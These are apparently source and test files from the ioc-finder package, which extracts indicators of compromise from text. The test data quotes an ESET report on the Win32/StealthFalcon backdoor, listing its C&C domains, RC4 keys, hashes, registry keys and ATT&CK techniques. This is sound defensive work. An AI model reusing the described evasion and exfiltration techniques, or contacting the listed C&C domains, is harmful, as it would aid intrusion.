We don’t know the precise intention of this function, but we suspect it is either some attempt to evade detection, or some leftover from a larger framework used by the malware authors.

Links to Stealth Falcon
Both Win32/StealthFalcon and the PowerShell-based backdoor described in the Citizen Lab analysis (https://citizenlab.ca/2016/05/stealth-falcon-appendices) share the same C&C server: the address windowsearchcache.com was used as a "Stage Two C2 Server Domain" in the backdoor analyzed by the Citizen Lab, and also in one of the versions of Win32/StealthFalcon.

Both backdoors display significant similarities in code – although they are written in different languages, the underlying logic is preserved. Both use hardcoded identifiers (most probably campaign ID/target ID). In both cases, all network communication from the compromised host is prefixed with these identifiers and encrypted with RC4 using a hardcoded key.

For their C&C server communication, they both use HTTPS but set specific flags for the connection to ignore the server certificate.

Conclusion
We discovered and analyzed a backdoor with an uncommon technique for C&C communication – using Windows BITS – and some advanced techniques to hinder detection and analysis, and to ensure persistence and complicate forensic analysis. Similarities in the code and infrastructure with a previously known malware by Stealth Falcon drive us to the conclusion that the Win32/StealthFalcon backdoor is also the work of this threat group.

ESET detection name
Win32/StealthFalcon

SHA-1
31B54AEBDAF5FBC73A66AC41CCB35943CC9B7F72
50973A3FC57D70C7911F7A952356188B9939E56B
244EB62B9AC30934098CA4204447440D6FC4E259
5C8F83CC4FF57E7C67925DF4D9DAABE5D0CC07E2

RC4 keys
258A4A9D139823F55D7B9DA1825D101107FBF88634A870DE9800580DAD556BA3
2519DB0FFEC604D6C9A655CF56B98EDCE10405DE36810BC3DCF125CDE30BA5A2
3EDB6EA77CD0987668B360365D5F39FDCF6B366D0DEAC9ECE5ADC6FFD20227F6
8DFFDE77A39F3AF46D0CE0B84A189DB25A2A0FEFD71A0CD0054D8E0D60AB08DE

Note: Malware derives a second RC4 key by XORing each byte of the hardcoded key with 0x3D.

Host-based indicators
Malware file names
ImageIndexer.dll
WindowsBackup.dll
WindowsSearchCache.dll
JavaUserUpdater.dll

Log file name patterns
%TEMP%\dsc*
%TEMP%\sld*
%TEMP%\plx*

Registry keys/values
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions
X-MRUList
X-MRUData
X-FontDisposition
X-IconDisposition
X-IconPosition
X-PopupPosition
X is the malware’s filename (without extension).

Network indicators
BITS job names
WindowsImages-
WindowsBackup-
WindowsSearchCache-
ElectricWeb

C&C servers
footballtimes.info
vegetableportfolio.com
windowsearchcache.com
electricalweb.org
upnpdiscover.org

Tactic  ID  Name    Description
Execution   T1059
Command-Line Interface  Malware uses cmd.exe to execute some commands.
T1106   Execution through API   Malware uses CreateProcessW API for execution.
T1085   Rundll32    Malware uses rundll32.exe to load the backdoor DLL.
T1053   Scheduled Task  Malware schedules rundll32.exe to be executed on each login, and subsequently to load the backdoor DLL.
Persistence T1053   Scheduled Task  Malware establishes persistence by scheduling a task that loads the backdoor on each user login.
Defense Evasion T1197   BITS Jobs   Malware uses BITS file transfer mechanism for network communication, in an attempt to avoid detection.
T1140   Deobfuscate/Decode Files or Information Strings are encrypted with a custom XOR cipher.
Configuration data and log files are encrypted with RC4, using a hardcoded key.
T1107 | File Deletion| Malware deletes files after exfiltration, and rewrites them with random data.
T1036| Masquerading| Malware attempts to masquerade itself by using seemingly-legitimate file names.
T1112| Modify Registry| Malware stores its configuration in a registry key.
T1027 | Obfuscated Files or Information| Strings are encrypted with a custom XOR cipher.
Configuration data and log files are encrypted with RC4, using a hardcoded key.
Discovery| T1063 | Security Software Discovery| Malware terminates itself if McAfee Agent binary (cmdagent.exe) is detected.
Collection| T1074 | Data Staged| Malware stores collected data in a temporary folder in files named with a hardcoded prefix.
T1005 | Data from Local System| Malware has a command to collect/steal a file from the compromised system.
Command and Control| T1008| Fallback Channels| Malware is able to communicate with two C&C servers, it also supports switching to a different C&C server using a backdoor command.
T1105| Remote File Copy| Malware uses BITS Jobs for C&C communication.
T1032| Standard Cryptographic Protocol| Malware encrypts C&C communication using RC4 with a hardcoded key.
Exfiltration| T1020| Automated Exfiltration| Malware automatically exfiltrates files in a temporary folder in files named with a hardcoded prefix.
T1022| Data Encrypted| Malware encrypts the collected data using RC4 with a hardcoded key, prior to exfiltration.
T1041| Exfiltration Over Command and Control Channel| Malware exfiltrates data over the C&C channel.
9 Sep 2019 - 11:30AM"""
    results = find_iocs(s)
    print("results['registry_key_paths'] {}".format(results['registry_key_paths']))
    assert len(results['registry_key_paths']) == 2


def test_issue_63():
    # see https://github.com/fhightower/ioc-finder/issues/63 - matching registry key paths with content between '<' and '>'
    s = 'The registry value “ntdll” was added to the “HKEY_USERS\<USER SID>\Software\Microsoft\Windows\CurrentVersion\Run” key.'
    results = find_iocs(s)
    assert results['registry_key_paths'] == ['HKEY_USERS\<USER SID>\Software\Microsoft\Windows\CurrentVersion\Run']

    s = 'The registry value “ntdll” was added to the “HKEY_USERS\<USER SID\Software\Microsoft\Windows\CurrentVersion\Run” key.'
    results = find_iocs(s)
    assert results['registry_key_paths'] == []


def test_registry_key_abbreviations():
    s = """<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: ShowSuperHidden
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: HideFileExt
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: SuperHidden
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED\FOLDER\HIDEFILEEXT
Value Name: DefaultValue
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: PC
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: avscan"""

    iocs = find_iocs(s)
    assert len(iocs['registry_key_paths']) == 4
    assert 'HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED' in iocs['registry_key_paths']
    assert (
        'HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED\FOLDER\HIDEFILEEXT'
        in iocs['registry_key_paths']
    )
    assert 'HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN' in iocs['registry_key_paths']
    assert 'HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN' in iocs['registry_key_paths']


def test_multiple_registry_key_path_parsing():
    """Make sure that consecutive registry key paths are parsed properly."""
    s = """HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console\ConsoleIME HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"""
    iocs = find_iocs(s)
    assert len(iocs['registry_key_paths']) == 2
    assert 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console\ConsoleIME' in iocs['registry_key_paths']
    assert 'HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN' in iocs['registry_key_paths']


def test_issue_46_registry_key_with_space_parsing():
    """Make sure that Registry Keys with a space in them are parsed properly. See: https://github.com/fhightower/ioc-finder/issues/46."""
    s = """HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console\ConsoleIME"""
    iocs = find_iocs(s)
    assert len(iocs['registry_key_paths']) == 1
    assert iocs['registry_key_paths'][0] == 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console\ConsoleIME'

    s = """HKLM\SOFTWARE\Microsoft\Windows ... NT\CurrentVersion\Console\ConsoleIME"""
    iocs = find_iocs(s)
    assert len(iocs['registry_key_paths']) == 1
    assert iocs['registry_key_paths'][0] == 'HKLM\SOFTWARE\Microsoft\Windows'

    s = """Found a registry key like <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED on the windows box"""
    iocs = find_iocs(s)
    assert len(iocs['registry_key_paths']) == 1
    assert iocs['registry_key_paths'][0] == 'HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED'

    s = """Found a registry key like HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console\ConsoleIME on the windows box"""
    iocs = find_iocs(s)
    assert len(iocs['registry_key_paths']) == 1
    assert iocs['registry_key_paths'][0] == 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console\ConsoleIME'

    s = 'HKLM\\SOFTWARE\\foo bar\\b'
    iocs = find_iocs(s)
    assert iocs['registry_key_paths'] == ['HKLM\\SOFTWARE\\foo bar\\b']

    s = 'HKLM\\SOFTWARE\\foo bar\\bing buzz\\b'
    iocs = find_iocs(s)
    assert iocs['registry_key_paths'] == ['HKLM\\SOFTWARE\\foo bar\\bing buzz\\b']

    s = 'HKLM\\SOFTWARE\\foo bar bing\\b'
    iocs = find_iocs(s)
    assert iocs['registry_key_paths'] == ['HKLM\\SOFTWARE\\foo bar bing\\b']

    s = 'HKLM\\SOFTWARE\\foo bar bing\\buzz boom\\b'
    iocs = find_iocs(s)
    assert iocs['registry_key_paths'] == ['HKLM\\SOFTWARE\\foo bar bing\\buzz boom\\b']

    s = 'HKLM\\SOFTWARE\\foo bar\\bing buzz boom\\b'
    iocs = find_iocs(s)
    assert iocs['registry_key_paths'] == ['HKLM\\SOFTWARE\\foo bar\\bing buzz boom\\b']

    s = 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\\notepad.exe'
    iocs = find_iocs(s)
    assert iocs['registry_key_paths'] == [
        'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\\notepad.exe'
    ]

    # any string with more than one space should be parsed such that anything after multiple spaces is NOT captured
    s = """HKLM\SOFTWARE\Microsoft\Windows  NT\CurrentVersion\Console\ConsoleIME"""
    iocs = find_iocs(s)
    assert len(iocs['registry_key_paths']) == 1
    assert iocs['registry_key_paths'][0] == 'HKLM\SOFTWARE\Microsoft\Windows'



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Python package for finding observables in text."""

import concurrent.futures
import json
import os
import sys

import click
import ioc_fanger

sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), ".")))
import ioc_grammars


def _deduplicate(indicator_list):
    """Deduplicate the list of observables."""
    return list(set(indicator_list))


def _listify(indicator_list):
    """Convert the multi-dimensional indicator list into a one-dimensional indicator list with empty entries and duplicates removed."""
    return _deduplicate([indicator[0] for indicator in indicator_list if indicator[0]])


def _remove_items(items, text):
    """Remove each item from the text."""
    for item in items:
        text = text.replace(item, ' ')
    return text


def _prepare_text(text):
    """Fang (https://ioc-fang.hightower.space/) and encode the text in such a way that all Unicode domain names are converted into their punycode representation."""
    text = ioc_fanger.fang(text)
    # text = text.encode('idna').decode('utf-8')
    return text


# TODO: replace this function with the democritus.stringRemoveFromEnd
def _remove_from_end(input_string: str, string_to_remove: str) -> str:
    """."""
    if input_string.endswith(string_to_remove):
        desired_string_final_index = len(input_string) - len(string_to_remove)
        updated_string = input_string[:desired_string_final_index]
        return updated_string
    else:
        return input_string


def parse_urls(text, parse_urls_without_scheme=True):
    """."""
    if parse_urls_without_scheme:
        urls = ioc_grammars.scheme_less_url.searchString(text)
    else:
        urls = ioc_grammars.url.searchString(text)
    urls = _listify(urls)

    clean_urls = []

    # clean the url
    for url in urls:
        # remove `"` and `'` characters from the end of a URL
        url = url.rstrip('"').rstrip("'")

        # remove a final ')' if there is a '(' in the url
        if url.endswith(')') and '(' not in url:
            url = url.rstrip(')')

        # remove `'/>` and `"/>` from the end of a URL (this character string occurs at the end of an HMTL tag with )
        url = _remove_from_end(url, '\'/>')
        url = _remove_from_end(url, '"/>')

        clean_urls.append(url)

    # return the cleaned urls - I deduplicate them again because the structure of the URL may have changed when it was cleaned
    return _deduplicate(clean_urls)


def _remove_url_paths(urls, text, parse_urls_without_scheme=True):
    """Remove the path from each url from the text."""
    for url in urls:
        if parse_urls_without_scheme:
            parsed_url = ioc_grammars.scheme_less_url.parseString(url)
        else:
            parsed_url = ioc_grammars.url.parseString(url)
        url_path = parsed_url.url_path

        # handle situations where the parsed url is likely a cidr range
        if parse_urls_without_scheme and parse_ipv4_cidrs(str(url)):
            pass
        elif len(url_path) > 1:
            text = text.replace(url_path, ' ')
    return text


def parse_domain_names(text):
    """."""
    domains = ioc_grammars.domain_name.searchString(text.lower())
    return _listify(domains)


def parse_ipv4_addresses(text):
    """."""
    addresses = ioc_grammars.ipv4_address.searchString(text)
    return _listify(addresses)


def parse_ipv6_addresses(text):
    """."""
    addresses = ioc_grammars.ipv6_address.searchString(text)
    return _listify(addresses)


def parse_complete_email_addresses(text):
    """."""
    email_addresses = ioc_grammars.complete_email_address.searchString(text)
    return _listify(email_addresses)


def parse_email_addresses(text):
    """."""
    email_addresses = ioc_grammars.email_address.searchString(text)
    return _listify(email_addresses)


# there is a trailing underscore on this function to differentiate it from the argument with the same name
def parse_imphashes_(text):
    """."""
    full_imphash_instances = ioc_grammars.imphash.searchString(text.lower())
    full_imphash_instances = _listify(full_imphash_instances)

    imphashes = []

    for imphash in full_imphash_instances:
        imphashes.append(ioc_grammars.imphash.parseString(imphash).hash[0])

    return imphashes


# there is a trailing underscore on this function to differentiate it from the argument with the same name
def parse_authentihashes_(text):
    """."""
    full_authentihash_instances = ioc_grammars.authentihash.searchString(text.lower())
    full_authentihash_instances = _listify(full_authentihash_instances)

    authentihashes = []

    for authentihash in full_authentihash_instances:
        authentihashes.append(ioc_grammars.authentihash.parseString(authentihash).hash[0])

    return authentihashes


def parse_md5s(text):
    """."""
    md5s = ioc_grammars.md5.searchString(text)
    return _listify(md5s)


def parse_sha1s(text):
    """."""
    sha1s = ioc_grammars.sha1.searchString(text)
    return _listify(sha1s)


def parse_sha256s(text):
    """."""
    sha256s = ioc_grammars.sha256.searchString(text)
    return _listify(sha256s)


def parse_sha512s(text):
    """."""
    sha512s = ioc_grammars.sha512.searchString(text)
    return _listify(sha512s)


def parse_ssdeeps(text):
    """."""
    ssdeeps = ioc_grammars.ssdeep.searchString(text)
    return _listify(ssdeeps)


def parse_asns(text):
    """."""
    asns = ioc_grammars.asn.searchString(text)
    return _listify(asns)


def parse_cves(text):
    """."""
    cves = ioc_grammars.cve.searchString(text)
    return _listify(cves)


def parse_ipv4_cidrs(text):
    """."""
    cidrs = ioc_grammars.ipv4_cidr.searchString(text)
    return _listify(cidrs)


# def parse_ipv6_cidrs(text):
#     """."""
#     # TODO: implement
#     cidrs = ioc_grammars.ipv6_cidr.searchString(text)
#     return _listify(cidrs)


def parse_registry_key_paths(text):
    """."""
    parsed_registry_key_paths = ioc_grammars.registry_key_path.searchString(text)
    full_parsed_registry_key_paths = _listify(parsed_registry_key_paths)

    registry_key_paths = []
    for registry_key_path in full_parsed_registry_key_paths:
        # if there is a space in the last section of the parsed registry key path, remove it so that content after a registry key path is not also pulled in... this is a limitation of the grammar: it will not parse a registry key path with a space in the final section (the section after the final '\')
        if ' ' in registry_key_path.split('\\')[-1]:
            last_section = registry_key_path.split('\\')[-1]
            registry_key_path = registry_key_path.replace(last_section, last_section.split(' ')[0])
            registry_key_paths.append(registry_key_path)
        else:
            registry_key_paths.append(registry_key_path)

    return registry_key_paths


def parse_google_adsense_ids(text):
    """."""
    adsense_publisher_ids = ioc_grammars.google_adsense_publisher_id.searchString(text)
    return _listify(adsense_publisher_ids)


def parse_google_analytics_ids(text):
    """."""
    analytics_tracker_ids = ioc_grammars.google_analytics_tracker_id.searchString(text)
    return _listify(analytics_tracker_ids)


def parse_bitcoin_addresses(text):
    """."""
    bitcoin_addresses = ioc_grammars.bitcoin_address.searchString(text)
    return _listify(bitcoin_addresses)


def parse_xmpp_addresses(text):
    """."""
    xmpp_addresses = ioc_grammars.xmpp_address.searchString(text)
    return _listify(xmpp_addresses)


def _remove_xmpp_local_part(xmpp_addresses, text):
    """Remove the local part of each xmpp_address from the text."""
    for address in xmpp_addresses:
        text = text.replace(address.split('@')[0] + '@', ' ')

    return text


def parse_mac_addresses(text):
    """."""
    mac_addresses = ioc_grammars.mac_address.searchString(text)
    return _listify(mac_addresses)


def parse_user_agents(text):
    """."""
    user_agents = ioc_grammars.user_agent.searchString(text)
    return _listify(user_agents)


def parse_file_paths(text):
    """."""
    file_paths = ioc_grammars.file_path.searchString(text)
    return _listify(file_paths)


def parse_phone_numbers(text):
    """."""
    phone_numbers = ioc_grammars.phone_number.searchString(text[::-1])
    return [phone_number[::-1] for phone_number in _listify(phone_numbers)]


def parse_pre_attack_tactics(text):
    """."""
    data = ioc_grammars.pre_attack_tactics_grammar.searchString(text)
    return _listify(data)


def parse_pre_attack_techniques(text):
    """."""
    data = ioc_grammars.pre_attack_techniques_grammar.searchString(text)
    return _listify(data)


def parse_enterprise_attack_mitigations(text):
    """."""
    data = ioc_grammars.enterprise_attack_mitigations_grammar.searchString(text)
    return _listify(data)


def parse_enterprise_attack_tactics(text):
    """."""
    data = ioc_grammars.enterprise_attack_tactics_grammar.searchString(text)
    return _listify(data)


def parse_enterprise_attack_techniques(text):
    """."""
    data = ioc_grammars.enterprise_attack_techniques_grammar.searchString(text)
    return _listify(data)


def parse_mobile_attack_mitigations(text):
    """."""
    data = ioc_grammars.mobile_attack_mitigations_grammar.searchString(text)
    return _listify(data)


def parse_mobile_attack_tactics(text):
    """."""
    data = ioc_grammars.mobile_attack_tactics_grammar.searchString(text)
    return _listify(data)


def parse_mobile_attack_techniques(text):
    """."""
    data = ioc_grammars.mobile_attack_techniques_grammar.searchString(text)
    return _listify(data)


def parse_tlp_labels(text):
    """."""
    tlp_labels = ioc_grammars.tlp_label.searchString(text)
    return _listify(tlp_labels)


@click.command()
@click.argument('text')
@click.option('--no_url_domain_parsing', is_flag=True, help='Using this flag will not parse domain names from URLs')
@click.option(
    '--no_email_addr_domain_parsing',
    is_flag=True,
    help='Using this flag will not parse domain names from email addresses',
)
@click.option(
    '--no_cidr_address_parsing', is_flag=True, help='Using this flag will not parse IP addresses from CIDR ranges'
)
@click.option(
    '--no_xmpp_addr_domain_parsing',
    is_flag=True,
    help='Using this flag will not parse domain names from XMPP addresses',
)
@click.option('--no_urls_without_schemes', is_flag=True, help='Using this flag will not parse URLs without schemes')
@click.option('--no_import_hashes', is_flag=True, help='Using this flag will not parse import hashes')
@click.option('--no_authentihashes', is_flag=True, help='Using this flag will not parse authentihashes')
def cli_find_iocs(
    text,
    no_url_domain_parsing,
    no_email_addr_domain_parsing,
    no_cidr_address_parsing,
    no_xmpp_addr_domain_parsing,
    no_urls_without_schemes,
    no_import_hashes,
    no_authentihashes,
):
    """CLI interface for parsing observables."""
    iocs = find_iocs(
        text,
        parse_domain_from_url=not no_url_domain_parsing,
        parse_domain_from_email_address=not no_email_addr_domain_parsing,
        parse_address_from_cidr=not no_cidr_address_parsing,
        parse_domain_name_from_xmpp_address=not no_xmpp_addr_domain_parsing,
        parse_urls_without_scheme=not no_urls_without_schemes,
        parse_imphashes=not no_import_hashes,
        parse_authentihashes=not no_authentihashes,
    )
    ioc_string = json.dumps(iocs, indent=4, sort_keys=True)
    print(ioc_string)


def find_iocs(
    text,
    parse_domain_from_url=True,
    parse_domain_from_email_address=True,
    parse_address_from_cidr=True,
    parse_domain_name_from_xmpp_address=True,
    parse_urls_without_scheme=True,
    parse_imphashes=True,
    parse_authentihashes=True,
):
    """Find observables in the given text."""
    iocs = dict()

    text = _prepare_text(text)
    # keep a copy of the original text - some items should be parsed from the original text
    original_text = text

    # urls
    iocs['urls'] = parse_urls(text, parse_urls_without_scheme)
    if not parse_domain_from_url:
        text = _remove_items(iocs['urls'], text)
    # even if we want to parse domain names from the urls, we need to remove the urls' paths to make sure no domain names are incorrectly parsed from the urls' paths
    else:
        text = _remove_url_paths(iocs['urls'], text, parse_urls_without_scheme)

    # xmpp addresses
    iocs['xmpp_addresses'] = parse_xmpp_addresses(text)
    if not parse_domain_name_from_xmpp_address:
        text = _remove_items(iocs['xmpp_addresses'], text)
    # even if we want to parse domain names from the xmpp_address, we don't want them also being caught as email addresses so we'll remove everything before the `@`
    else:
        text = _remove_xmpp_local_part(iocs['xmpp_addresses'], text)

    # complete email addresses
    iocs['email_addresses_complete'] = parse_complete_email_addresses(text)
    # simple email addresses
    iocs['email_addresses'] = parse_email_addresses(text)
    if not parse_domain_from_email_address:
        text = _remove_items(iocs['email_addresses_complete'], text)
        text = _remove_items(iocs['email_addresses'], text)
    # after parsing the email addresses, we need to remove the '[IPv6:' bit from any of the email addresses so that ipv6 addresses are not extraneously parsed
    text = _remove_items(['[IPv6:'], text)

    # cidr ranges
    iocs['ipv4_cidrs'] = parse_ipv4_cidrs(text)
    if not parse_address_from_cidr:
        text = _remove_items(iocs['ipv4_cidrs'], text)
    # iocs['ipv6_cidrs'] = parse_ipv6_cidrs(text)
    # if not parse_address_from_cidr:
    #     text = _remove_items(iocs['ipv6_cidrs'], text)

    # file hashes
    if parse_imphashes:
        iocs['imphashes'] = parse_imphashes_(text)
        # remove the imphashes so they are not also parsed as md5s
        text = _remove_items(iocs['imphashes'], text)

    if parse_authentihashes:
        iocs['authentihashes'] = parse_authentihashes_(text)
        # remove the authentihashes so they are not also parsed as sha256s
        text = _remove_items(iocs['authentihashes'], text)

    with concurrent.futures.ProcessPoolExecutor() as executor:
        # domains
        iocs['domains'] = executor.submit(parse_domain_names, text).result()

        # ip addresses
        iocs['ipv4s'] = executor.submit(parse_ipv4_addresses, text).result()
        iocs['ipv6s'] = executor.submit(parse_ipv6_addresses, text).result()

        # file hashes
        iocs['sha512s'] = executor.submit(parse_sha512s, text).result()
        iocs['sha256s'] = executor.submit(parse_sha256s, text).result()
        iocs['sha1s'] = executor.submit(parse_sha1s, text).result()
        iocs['md5s'] = executor.submit(parse_md5s, text).result()
        iocs['ssdeeps'] = executor.submit(parse_ssdeeps, text).result()

        # misc
        iocs['asns'] = executor.submit(parse_asns, text).result()
        iocs['cves'] = executor.submit(parse_cves, [original_text]).result()
        iocs['registry_key_paths'] = executor.submit(parse_registry_key_paths, text).result()
        iocs['google_adsense_publisher_ids'] = executor.submit(parse_google_adsense_ids, text).result()
        iocs['google_analytics_tracker_ids'] = executor.submit(parse_google_analytics_ids, text).result()
        iocs['bitcoin_addresses'] = executor.submit(parse_bitcoin_addresses, text).result()
        iocs['mac_addresses'] = executor.submit(parse_mac_addresses, text).result()
        iocs['user_agents'] = executor.submit(parse_user_agents, text).result()
        iocs['file_paths'] = executor.submit(parse_file_paths, text).result()
        iocs['phone_numbers'] = executor.submit(parse_phone_numbers, text).result()
        iocs['tlp_labels'] = executor.submit(parse_tlp_labels, original_text).result()

        iocs['attack_mitigations'] = {
            "enterprise": executor.submit(parse_enterprise_attack_mitigations, original_text).result(),
            "mobile": executor.submit(parse_mobile_attack_mitigations, original_text).result(),
        }
        iocs['attack_tactics'] = {
            "pre_attack": executor.submit(parse_pre_attack_tactics, original_text).result(),
            "enterprise": executor.submit(parse_enterprise_attack_tactics, original_text).result(),
            "mobile": executor.submit(parse_mobile_attack_tactics, original_text).result(),
        }
        iocs['attack_techniques'] = {
            "pre_attack": executor.submit(parse_pre_attack_techniques, original_text).result(),
            "enterprise": executor.submit(parse_enterprise_attack_techniques, original_text).result(),
            "mobile": executor.submit(parse_mobile_attack_techniques, original_text).result(),
        }

    return iocs



pre_attack_tactics = ['TA0021', 'TA0024', 'TA0022', 'TA0017', 'TA0020', 'TA0016', 'TA0019', 'TA0023', 'TA0013', 'TA0012', 'TA0026', 'TA0014', 'TA0015', 'TA0018', 'TA0025']
pre_attack_techniques = ['T1266', 'T1247', 'T1277', 'T1329', 'T1307', 'T1308', 'T1330', 'T1310', 'T1332', 'T1275', 'T1293', 'T1288', 'T1301', 'T1287', 'T1294', 'T1300', 'T1289', 'T1297', 'T1303', 'T1295', 'T1306', 'T1229', 'T1236', 'T1224', 'T1299', 'T1302', 'T1296', 'T1298', 'T1238', 'T1228', 'T1381', 'T1386', 'T1384', 'T1347', 'T1349', 'T1341', 'T1328', 'T1352', 'T1391', 'T1343', 'T1321', 'T1312', 'T1334', 'T1354', 'T1388', 'T1254', 'T1226', 'T1253', 'T1279', 'T1268', 'T1249', 'T1376', 'T1383', 'T1339', 'T1345', 'T1232', 'T1355', 'T1231', 'T1374', 'T1382', 'T1324', 'T1320', 'T1380', 'T1230', 'T1284', 'T1260', 'T1245', 'T1285', 'T1250', 'T1259', 'T1258', 'T1243', 'T1242', 'T1282', 'T1244', 'T1241', 'T1227', 'T1342', 'T1350', 'T1255', 'T1379', 'T1394', 'T1323', 'T1326', 'T1286', 'T1311', 'T1333', 'T1262', 'T1261', 'T1377', 'T1325', 'T1344', 'T1364', 'T1234', 'T1365', 'T1314', 'T1385', 'T1233', 'T1280', 'T1272', 'T1283', 'T1225', 'T1270', 'T1248', 'T1278', 'T1267', 'T1269', 'T1271', 'T1348', 'T1263', 'T1274', 'T1276', 'T1246', 'T1265', 'T1264', 'T1389', 'T1256', 'T1336', 'T1375', 'T1252', 'T1273', 'T1257', 'T1322', 'T1315', 'T1316', 'T1390', 'T1309', 'T1331', 'T1318', 'T1319', 'T1313', 'T1392', 'T1396', 'T1251', 'T1281', 'T1346', 'T1363', 'T1353', 'T1305', 'T1335', 'T1304', 'T1373', 'T1239', 'T1235', 'T1351', 'T1378', 'T1291', 'T1290', 'T1358', 'T1395', 'T1337', 'T1338', 'T1317', 'T1340', 'T1367', 'T1369', 'T1368', 'T1397', 'T1237', 'T1371', 'T1366', 'T1240', 'T1393', 'T1356', 'T1357', 'T1359', 'T1360', 'T1292', 'T1361', 'T1387', 'T1372', 'T1370', 'T1362', 'T1327']

enterprise_attack_mitigations = ['M1036', 'M1015', 'M1049', 'M1013', 'M1048', 'M1047', 'M1040', 'M1046', 'M1045', 'M1043', 'M1053', 'M1042', 'M1055', 'M1041', 'M1039', 'M1038', 'M1050', 'M1037', 'M1035', 'M1034', 'M1033', 'M1032', 'M1031', 'M1030', 'M1028', 'M1027', 'M1026', 'M1025', 'M1029', 'M1022', 'M1044', 'M1024', 'M1021', 'M1020', 'M1054', 'M1019', 'M1051', 'M1052', 'M1018', 'M1017', 'M1016']
enterprise_attack_tactics = ['TA0009', 'TA0011', 'TA0006', 'TA0005', 'TA0007', 'TA0002', 'TA0010', 'TA0040', 'TA0001', 'TA0008', 'TA0003', 'TA0004']
enterprise_attack_techniques = ['T1156', 'T1134', 'T1015', 'T1531', 'T1087', 'T1098', 'T1182', 'T1103', 'T1155', 'T1527', 'T1017', 'T1138', 'T1010', 'T1123', 'T1131', 'T1119', 'T1020', 'T1197', 'T1139', 'T1009', 'T1067', 'T1217', 'T1176', 'T1110', 'T1088', 'T1191', 'T1042', 'T1146', 'T1115', 'T1522', 'T1538', 'T1526', 'T1116', 'T1059', 'T1043', 'T1092', 'T1500', 'T1223', 'T1109', 'T1122', 'T1175', 'T1090', 'T1196', 'T1136', 'T1003', 'T1503', 'T1081', 'T1214', 'T1094', 'T1024', 'T1207', 'T1038', 'T1073', 'T1002', 'T1485', 'T1132', 'T1022', 'T1486', 'T1001', 'T1074', 'T1030', 'T1530', 'T1213', 'T1005', 'T1039', 'T1025', 'T1491', 'T1140', 'T1089', 'T1488', 'T1487', 'T1172', 'T1483', 'T1482', 'T1189', 'T1157', 'T1173', 'T1514', 'T1114', 'T1519', 'T1499', 'T1480', 'T1106', 'T1129', 'T1048', 'T1041', 'T1011', 'T1052', 'T1190', 'T1203', 'T1212', 'T1211', 'T1068', 'T1210', 'T1133', 'T1181', 'T1008', 'T1107', 'T1006', 'T1044', 'T1083', 'T1222', 'T1495', 'T1187', 'T1144', 'T1061', 'T1484', 'T1148', 'T1200', 'T1158', 'T1147', 'T1143', 'T1179', 'T1062', 'T1183', 'T1525', 'T1054', 'T1066', 'T1070', 'T1202', 'T1490', 'T1056', 'T1141', 'T1130', 'T1118', 'T1534', 'T1208', 'T1215', 'T1142', 'T1161', 'T1149', 'T1171', 'T1177', 'T1159', 'T1160', 'T1152', 'T1168', 'T1162', 'T1037', 'T1185', 'T1036', 'T1031', 'T1112', 'T1170', 'T1104', 'T1188', 'T1026', 'T1079', 'T1096', 'T1128', 'T1498', 'T1046', 'T1126', 'T1135', 'T1040', 'T1050', 'T1027', 'T1137', 'T1502', 'T1075', 'T1097', 'T1174', 'T1201', 'T1034', 'T1120', 'T1069', 'T1150', 'T1205', 'T1013', 'T1086', 'T1504', 'T1145', 'T1057', 'T1186', 'T1093', 'T1055', 'T1012', 'T1163', 'T1164', 'T1108', 'T1060', 'T1121', 'T1117', 'T1219', 'T1076', 'T1105', 'T1021', 'T1018', 'T1091', 'T1496', 'T1536', 'T1014', 'T1085', 'T1494', 'T1178', 'T1198', 'T1184', 'T1053', 'T1029', 'T1113', 'T1180', 'T1064', 'T1063', 'T1101', 'T1167', 'T1505', 'T1035', 'T1058', 'T1489', 'T1166', 'T1051', 'T1023', 'T1218', 'T1216', 'T1518', 'T1045', 'T1153', 'T1151', 'T1193', 'T1192', 'T1194', 'T1071', 'T1032', 'T1095', 'T1165', 'T1528', 'T1539', 'T1492', 'T1169', 'T1206', 'T1195', 'T1019', 'T1082', 'T1016', 'T1049', 'T1033', 'T1007', 'T1529', 'T1124', 'T1501', 'T1080', 'T1221', 'T1072', 'T1209', 'T1099', 'T1537', 'T1493', 'T1154', 'T1127', 'T1199', 'T1111', 'T1065', 'T1535', 'T1204', 'T1078', 'T1125', 'T1497', 'T1102', 'T1506', 'T1100', 'T1077', 'T1047', 'T1084', 'T1028', 'T1004', 'T1220']

